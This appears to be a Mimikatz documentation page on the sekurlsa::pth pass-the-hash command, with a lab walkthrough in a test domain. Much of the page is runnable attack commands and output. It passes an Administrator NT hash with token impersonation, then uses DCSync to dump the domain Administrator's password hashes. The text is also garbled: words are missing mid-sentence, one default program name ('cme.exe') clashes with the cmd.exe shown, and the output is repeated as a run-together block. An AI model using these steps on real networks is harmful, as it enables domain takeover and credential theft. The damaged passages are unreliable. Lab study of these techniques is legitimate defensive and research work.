pth

sekurlsa::pth performs , and . Upon successful authentication, a program is run (n.b. defaulted to cme.exe). It has the following command line arguments:

/user : the username to impersonate. It must be noted that Administrator is not the only name for this well-known account.
/domain : the fully qualified domain name. If Active Directory domain services are not in use or in case of local user/admin, a computer or a server name, workgroup can be used.
/rc4 or /ntlm : the RC4 key / NT hash (derived of the user's password).
/aes128 : the AES128 key derived from the user's password and the realm of the domain.
/aes256 : the AES256 key derived from the user's password and the realm of the domain.
/run : the command line to run (defaulted to cmd.exe).
/luid : locally unique identifier. According to Microsoft, the is a 64-bit value guaranteed to be unique only on the system on which it was generated. The uniqueness of an LUID is guaranteed only until the system is restarted.
/impersonate : It performs . It must be noted that a new process is not spawned but the token is injected on the process running Mimikatz.

LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called NTLM hash and many documentations, resources, blogpost and tools mix terms. In this case, "ntlm" refers to the NT hash.

()

Doing on a Windows system requires specific privilege. It either requires elevated privileges (by previously running or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account). This doesn't apply to which uses an official API.

mimikatz # sekurlsa::pth /user:Administrator /domain:hacklab.local /ntlm:b09a14d2d325026f8986d4a874fbcbc7
user    : Administrator
domain  : hacklab.local
program : cmd.exe
impers. : no
NTLM    : b09a14d2d325026f8986d4a874fbcbc7
  |  PID  5896
  |  TID  4620
  |  LSA Process is now R/W
  |  LUID 0 ; 82772120 (00000000:04ef0098)
  \_ msv1_0   - data copy @ 0000023A0E8BD5C0 : OK !
  \_ kerberos - data copy @ 0000023A0E9FF5A8
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 0000023A0E941CE8 (32) -> null

With token impersonation

As can be seen in the following output the hacklab\optimus user is a low privileged user in the HACKLAB.LOCAL active directory domain:

C:\Users\optimus>net user optimus /domain
The request will be processed at a domain controller for domain hacklab.local.

User name                    optimus
Full Name                    optimus prime
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            18/10/2021 15:39:30
Password expires             Never
Password changeable          19/10/2021 15:39:30
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   18/10/2021 15:56:39

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

mimikatz # lsadump::dcsync /user:Administrator
[DC] 'hacklab.local' will be the domain
[DC] 'DC.hacklab.local' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

mimikatz # sekurlsa::pth /user:Administrator /domain:hacklab.local /ntlm:b09a14d2d325026f8986d4a874fbcbc7 /impersonate
user    : Administrator
domain  : hacklab.local
program : C:\Users\Public\x64\mimikatz.exe
impers. : yes
NTLM    : b09a14d2d325026f8986d4a874fbcbc7
  |  PID  7368
  |  TID  3204
  |  LSA Process is now R/W
  |  LUID 0 ; 86889532 (00000000:052dd43c)
  \_ msv1_0   - data copy @ 0000023A0E8BD7B0 : OK !
  \_ kerberos - data copy @ 0000023A0E9FE8E8
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 0000023A0E96C0E8 (32) -> null
** Token Impersonation **

mimikatz # lsadump::dcsync /user:Administrator
[DC] 'hacklab.local' will be the domain
[DC] 'DC.hacklab.local' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   : 01/01/1601 01:00:00
Password last change : 24/09/2021 16:24:41
Object Security ID   : S-1-5-21-2725560159-1428537199-2260736313-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: b09a14d2d325026f8986d4a874fbcbc7
    ntlm- 0: b09a14d2d325026f8986d4a874fbcbc7
    ntlm- 1: a06b19f88e0432e937a67fb6848e56bd

...Output Omitted...

According to Benjamin the following must be taken into consideration:

This command does not work with minidumps (nonsense)
this new version of 'Pass-The-Hash' replaces RC4 keys of Kerberos by the NT hash (and/or replaces AES keys). It allows the Kerberos provider to ask TGT tickets.
NT hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)
AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case an NT hash is not required.

Previousprocess Nextssp

Last updated 3 years ago

mimikatz # sekurlsa::pth /user:Administrator /domain:hacklab.local /ntlm:b09a14d2d325026f8986d4a874fbcbc7 user : Administrator domain : hacklab.local program : cmd.exe impers. : no NTLM : b09a14d2d325026f8986d4a874fbcbc7 | PID 5896 | TID 4620 | LSA Process is now R/W | LUID 0 ; 82772120 (00000000:04ef0098) \_ msv1_0 - data copy @ 0000023A0E8BD5C0 : OK ! \_ kerberos - data copy @ 0000023A0E9FF5A8 \_ des_cbc_md4 -> null \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ *Password replace @ 0000023A0E941CE8 (32) -> null

C:\Users\optimus>net user optimus /domain The request will be processed at a domain controller for domain hacklab.local. User name optimus Full Name optimus prime Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 18/10/2021 15:39:30 Password expires Never Password changeable 19/10/2021 15:39:30 Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 18/10/2021 15:56:39 Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users The command completed successfully.

mimikatz # lsadump::dcsync /user:Administrator [DC] 'hacklab.local' will be the domain [DC] 'DC.hacklab.local' will be the DC server [DC] 'Administrator' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

mimikatz # sekurlsa::pth /user:Administrator /domain:hacklab.local /ntlm:b09a14d2d325026f8986d4a874fbcbc7 /impersonate user : Administrator domain : hacklab.local program : C:\Users\Public\x64\mimikatz.exe impers. : yes NTLM : b09a14d2d325026f8986d4a874fbcbc7 | PID 7368 | TID 3204 | LSA Process is now R/W | LUID 0 ; 86889532 (00000000:052dd43c) \_ msv1_0 - data copy @ 0000023A0E8BD7B0 : OK ! \_ kerberos - data copy @ 0000023A0E9FE8E8 \_ des_cbc_md4 -> null \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ *Password replace @ 0000023A0E96C0E8 (32) -> null ** Token Impersonation **

mimikatz # lsadump::dcsync /user:Administrator [DC] 'hacklab.local' will be the domain [DC] 'DC.hacklab.local' will be the DC server [DC] 'Administrator' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) Object RDN : Administrator ** SAM ACCOUNT ** SAM Username : Administrator Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00000200 ( NORMAL_ACCOUNT ) Account expiration : 01/01/1601 01:00:00 Password last change : 24/09/2021 16:24:41 Object Security ID : S-1-5-21-2725560159-1428537199-2260736313-500 Object Relative ID : 500 Credentials: Hash NTLM: b09a14d2d325026f8986d4a874fbcbc7 ntlm- 0: b09a14d2d325026f8986d4a874fbcbc7 ntlm- 1: a06b19f88e0432e937a67fb6848e56bd ...Output Omitted...